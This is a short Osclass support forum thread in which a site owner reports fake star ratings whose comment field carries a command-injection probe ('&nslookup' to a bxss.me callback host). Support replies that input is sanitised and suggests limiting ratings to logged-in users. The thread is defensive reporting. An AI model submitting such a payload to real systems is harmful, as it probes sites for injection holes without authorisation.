Osclass Support Forums
Unread
New Replies
Osclass Market
Download Osclass
Documentation
Home
Help
Search
Login
Register
Rating comment spam hack attempt
Osclass Support Forums
Osclass plugin support
User Rating Plugin
Rating comment spam hack attempt
Match all words
Match any words
Most relevant results first
Largest topics first
Smallest topics first
Most recent topics first
Oldest topics first
Advanced
Show unread posts since last visit
Show new replies to your posts
Print
Pages: [
1
]
Ajit Sahane
147 posts
https://bestclassifiedsusa.com
Rating comment spam hack attempt
«
on:
May 24, 2023, 11:19:32 AM »
I found lot of comment filed spam + hack code submitted by hackers. If we user rating auto approve set then anybody submit 1-5* fake rating with comment value - &nslookup -q=cname hitmtjqtyxgegbc74e.bxss.me& like this.
So, this plugin comment text need to filter those html - sql query code. need sanitization text submission.
check screenshot
Logged
https://bestclassifiedsusa.com
MB Themes
Support team
16965 posts
Only quality matters
Download Osclass
Re: Rating comment spam hack attempt
«
Reply #1 on:
May 24, 2023, 11:46:00 AM »
Enable rating for logged in users only.
Text is sanitized and do not think it represent any issue. If you print this on website I expect it's printed as text and not as HTML code.
Logged
To get fast support, we need following details:
Detail description, URL to reproduce problem, Screenshots
Ajit Sahane
147 posts
https://bestclassifiedsusa.com
Re: Rating comment spam hack attempt
«
Reply #2 on:
May 25, 2023, 06:25:15 AM »
Yes. Now validation is ON. and website print content is text format, not html.
So, not big issue.
Just aware about this type hack attempt for future security.
It's clear shown, bad actors trying to something doing unusual activities.
Logged
https://bestclassifiedsusa.com
Print
Pages: [
1
]